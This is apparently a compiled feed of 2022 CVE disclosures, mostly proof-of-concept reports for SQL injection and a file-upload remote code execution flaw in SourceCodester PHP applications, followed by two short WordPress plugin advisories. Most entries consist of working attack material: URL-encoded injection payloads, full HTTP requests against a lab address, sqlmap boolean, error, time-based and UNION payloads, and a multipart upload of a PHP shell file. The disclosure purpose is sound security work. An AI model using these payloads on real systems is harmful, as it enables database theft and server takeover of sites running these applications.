Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/pagerole.php&action=display&value=1&roleid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/pagerole.php&action=display&value=1&roleid=

Vulnerability location: /BabyCare/admin.php?id=pagerole&action=display&value=1&roleid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=pagerole&action=display&value=1&roleid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //roleid is Injection point

GET /BabyCare/admin.php?id\=pagerole&action\=display&value\=1&roleid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: roleid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=pagerole&action\=display&value\=1&roleid\=3' RLIKE (SELECT (CASE WHEN (6967=6967) THEN 3 ELSE 0x28 END))-- nhxC
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=pagerole&action=display&value=1&roleid=3' AND (SELECT 2190 FROM(SELECT COUNT(\*),CONCAT(0x7162627871,(SELECT (ELT(2190\=2190,1))),0x717a766b71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- Gllb

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=pagerole&action\=display&value\=1&roleid\=3' AND (SELECT 4825 FROM (SELECT(SLEEP(5)))FSej)-- xCer
\---

CVE-2022-28425: bug_report/SQLi-6.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=delete.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=delete

Vulnerability location: /BabyCare/admin.php?id=posts&action=delete&postid=7&image= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=delete&postid=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+&image= //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=delete&postid\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--+&image= HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=delete&postid\=7' RLIKE (SELECT (CASE WHEN (3209=3209) THEN 7 ELSE 0x28 END))-- pges&image=
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=posts&action=delete&postid=7' AND EXTRACTVALUE(7032,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7032\=7032,1))),0x7171787171))\-- OvNm&image=

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=delete&postid\=7' AND (SELECT 3278 FROM (SELECT(SLEEP(5)))KhCO)-- EGcS&image=
\--

CVE-2022-28423: bug_report/SQLi-4.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&find=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&find=

Vulnerability location: /BabyCare/admin.php?id=posts&find= //find is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&find=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //find is Injection point

GET /BabyCare/admin.php?id\=posts&find\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: find (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&find\=3' RLIKE (SELECT (CASE WHEN (6593=6593) THEN 3 ELSE 0x28 END))-- zXvu
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&find=3' AND (SELECT 3959 FROM(SELECT COUNT(\*),CONCAT(0x7170787071,(SELECT (ELT(3959\=3959,1))),0x7178787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- IVWt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&find\=3' AND (SELECT 4643 FROM (SELECT(SLEEP(5)))bafh)-- GSoV
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=posts&find=3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x65476d614a4d4d69526c636a4e486f436b45485a67484d67736e4e47657a654761684c644d734557,0x7178787171),NULL#
\--\-

CVE-2022-28424: bug_report/SQLi-5.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=school_year.

Permalink

Cannot retrieve contributors at this time

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=school\_year

Vulnerability location: /student-grading-system/rms.php?page=school\_year,sy

\[+\] Pyaload: id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

POST /student\-grading\-system/rms.php?page\=school\_year HTTP/1.1
Host: 192.168.1.19
Content\-Length: 71
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=school\_year
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

CVE-2022-28025: bug_report/SQLi-2.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=grade.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=grade

Vulnerability location: /student-grading-system/rms.php?page=grade,id

\[+\] Pyaload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

POST /student\-grading\-system/rms.php?page\=grade HTTP/1.1
Host: 192.168.1.19
Content\-Length: 133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=grade
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

CVE-2022-28024: bug_report/SQLi-1.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=student_p&id=.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=student\_p&id=

Vulnerability location: /student-grading-system/rms.php?page=student\_p&id=,id

\[+\] Pyaload: id=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19--+-

GET /student\-grading\-system/rms.php?page\=student\_p&id\=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19\--+- HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=j0d3j11j73v4lm3m8d74g5d3gu
Connection: close

CVE-2022-28026: bug_report/SQLi-3.md at main · k0xx11/bug_report

Purchase Order Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via /purchase_order/admin/?page=user.

Permalink

Cannot retrieve contributors at this time

**Purchase-order-management-system v1.0 by oretnom23 has arbitrary code execution (RCE)**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability url: http://ip/purchase\_order/admin/?page=user

Request package for file upload：

POST /purchase\_order/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
Content\-Length: 799
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylz8EuWf30x9QqTzc
Origin: http://192.168.1.19
Referer: http://192.168.1.19/purchase\_order/admin/?page=user/manage\_user&id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sils4jibq9sp4e2n7i4joq8to7
Connection: close
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="id"
3
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="firstname"
Mike 
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="lastname"
Williams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="username"
mwilliams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="password"
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="type"
2
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\------WebKitFormBoundarylz8EuWf30x9QqTzc--

The file will be uploaded to the uploads directory

We visit the url of the shell.php file and find that the code has been executed

Url: http://ip/purchase\_order/uploads/1648212480\_shell.php

CVE-2022-28021: bug_report/RCE-1.md at main · k0xx11/bug_report

The WordPress WP YouTube Live Plugin is vulnerable to Reflected Cross-Site Scripting via POST data found in the ~/inc/admin.php file which allows unauthenticated attackers to inject arbitrary web scripts in versions up to, and including, 1.7.21.

CVE-2022-1187: admin.php in wp-youtube-live/trunk/inc – WordPress Plugin Repository

The WordPress plugin Be POPIA Compliant exposed sensitive information to unauthenticated users consisting of site visitors emails and usernames via an API route, in versions up to an including 1.1.5.

Tag

#chrome